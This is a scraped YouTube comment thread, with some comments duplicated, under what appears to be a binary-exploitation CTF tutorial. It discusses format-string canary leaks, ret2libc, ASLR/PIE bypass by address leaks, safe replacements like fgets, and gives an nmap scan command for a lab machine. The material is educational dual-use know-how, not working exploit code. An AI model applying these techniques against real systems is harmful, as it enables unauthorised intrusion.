It is definitely OK to struggle with this! Binary exploitation is an extremely niche topic, in a field which already requires a lot of expertise (infosec). If you understand even the most basic concepts, you're in a very small minority on the planet! 🧠
System() function had a different address in my libc but I was able to create the correct payload and It ran successfully on first attempt. It might not seem like a difficult thing to do but my clarity on this topic after doing it is a lot better. Thanks a lot for precise and great explanation sir. You are an amazing teacher.
Thanks mate! There's definitely been some changes as a lot of people have commented recently they've been unable to find the "pop rdi" gadget for some of the challenges. Glad you were able to get around it 🙂
Hi , nice video. In this example you can not overflow because the Canary ? When I start watch the video I think that you leak the canary with Format String, but your approach to solve was amazing. Thx for your time.
Exactly! We couldn't overflow the buffer without tripping the canary. However, we could use the format string vuln to leak the canary, then do a buffer overflow attack. That's covered in the next episode 😉
Guys, take care when you have to use quote or double quote when you generate the manual_payload. Your soul will depend on it. Make sure you have your payload between double quotes and the python command in single quote (just like in the video at 21:13) . I spent several hours to find this mistake. 🙃
@@Mersal-tq9lm There's this old one, audio quality isn't great though: th-cam.com/video/p2U6cnGsfuw/w-d-xo.html HackTheBox have a pivot challenge as well so if they retire it, I'll make a video on it at some point 😊
The vulnerabilities in this video series can be avoided if they check the size of input before putting into buffer and if they specify the format strings properly right?
Yep! In fact, in many cases just swapping an unsafe function to a safe function will do the trick, e.g. when you compile a C program with "gets()" it warns that the function is inherently dangerous and advises to replace with "fgets()". Oh, and having strong binary protections enabled (stack canaries, DEP/NX, PIE, RO-GOT etc) is a good idea too!
Is this the new machine released today? Really bad timing lol. They released it the day I left the country grrrrr 😑 I'll be back in a week then will make a video! 😁
Can you please try the machine and tell me how to scan the machine.i am trying it for two days i am not able to get nmap it.try and tell me how to nmap it.
@@kathikaran4472 Yes mate! I did do the machine, I just can't make a video until next week. This should work for you to identify the service: nmap -sV -sC -p- [ip address]
Not rude at all! Leaving your questions might help others though, you can edit with your update to say how you fixed it/understood it. Totally up to you though 😉
If ASLR or PIE is enabled, you'd just need to leak an address before you could perform the exploit. If you check some of my pwn CTF videos, a lot of them have both ASLR+PIE enabled. Although ASLR and PIE are similar techniques, they don't need to be enabled together. You could have ASLR enabled (randomizing stack addresses) AND/OR PIE enabled (randomizing program sections). More info here: guyinatuxedo.github.io/5.1-mitigation_aslr_pie/index.html
An example of printf() format write exploit, from real CTF: th-cam.com/video/NOY_dc2fRbU/w-d-xo.html
14:05
Thanks for mentioning that it’s ok to struggle with this and that it takes a long time to learn. This helps with our motivation.
It is definitely OK to struggle with this! Binary exploitation is an extremely niche topic, in a field which already requires a lot of expertise (infosec). If you understand even the most basic concepts, you're in a very small minority on the planet! 🧠
Very clear and well explained! Always high-quality content, well done!
System() function had a different address in my libc but I was able to create the correct payload and It ran successfully on first attempt. It might not seem like a difficult thing to do but my clarity on this topic after doing it is a lot better. Thanks a lot for precise and great explanation sir. You are an amazing teacher.
Thanks mate! There's definitely been some changes as a lot of people have commented recently they've been unable to find the "pop rdi" gadget for some of the challenges. Glad you were able to get around it 🙂
This vulnerability is somewhat similar to tcache poisoning attack. Anyway, very informative video, learnt bunch of new things!
Awesome video it made me solve my first pwn ctf 😁
Great to hear! 👏
Loved it!
Hi , nice video. In this example you can not overflow because the Canary ? When I start watch the video I think that you leak the canary with Format String, but your approach to solve was amazing. Thx for your time.
Exactly! We couldn't overflow the buffer without tripping the canary. However, we could use the format string vuln to leak the canary, then do a buffer overflow attack. That's covered in the next episode 😉
19:24 I was very confuse at this point, turn out %7 is the offset of 'buffer' in the blogpost :D
Guys, take care when you have to use quote or double quote when you generate the manual_payload. Your soul will depend on it. Make sure you have your payload between double quotes and the python command in single quote (just like in the video at 21:13) . I spent several hours to find this mistake. 🙃
"Your soul will depend on it" - love it 👌😂
Love your videos ❤
Can you make a video that explains stack pivoting and how to exploit it with a ret2libc 🥺
Good idea, noted! 💜
@@_CryptoCat is there video on this topic?
@@Mersal-tq9lm There's this old one, audio quality isn't great though: th-cam.com/video/p2U6cnGsfuw/w-d-xo.html
HackTheBox have a pivot challenge as well so if they retire it, I'll make a video on it at some point 😊
@@_CryptoCat Awesome 👍
The vulnerabilities in this video series can be avoided if they check the size of input before putting into buffer and if they specify the format strings properly right?
Yep! In fact, in many cases just swapping an unsafe function to a safe function will do the trick, e.g. when you compile a C program with "gets()" it warns that the function is inherently dangerous and advises to replace with "fgets()". Oh, and having strong binary protections enabled (stack canaries, DEP/NX, PIE, RO-GOT etc) is a good idea too!
Why u cant do video for redmeer machine in starting point.
Is this the new machine released today? Really bad timing lol. They released it the day I left the country grrrrr 😑 I'll be back in a week then will make a video! 😁
I am waiting for your video.
@@kathikaran4472 🙏🥰
Can you please try the machine and tell me how to scan the machine.i am trying it for two days i am not able to get nmap it.try and tell me how to nmap it.
@@kathikaran4472 Yes mate! I did do the machine, I just can't make a video until next week. This should work for you to identify the service:
nmap -sV -sC -p- [ip address]
@CryptoCat it won't be rude to delete comments about questions i asked when I wasn't clear about something then later got it right xD 😂?
Not rude at all! Leaving your questions might help others though, you can edit with your update to say how you fixed it/understood it. Totally up to you though 😉
Thanks for your phenomenal explanation. Can you share your Patreon or PayPal? I would love to show my gratitude to you. Thanks so much!"
Hey, thanks for the support! Please don't worry about payment though, I'm happy to make content for the community 🥰
do you have contents about heap exploits, sir?
No series but I have a couple of CTF vids: th-cam.com/video/U2OgL66-6BE/w-d-xo.html + th-cam.com/video/55jibxjUj3I/w-d-xo.html
What is the exploit if I enable ASLR? which would enable PIE also?
If ASLR or PIE is enabled, you'd just need to leak an address before you could perform the exploit. If you check some of my pwn CTF videos, a lot of them have both ASLR+PIE enabled. Although ASLR and PIE are similar techniques, they don't need to be enabled together. You could have ASLR enabled (randomizing stack addresses) AND/OR PIE enabled (randomizing program sections). More info here: guyinatuxedo.github.io/5.1-mitigation_aslr_pie/index.html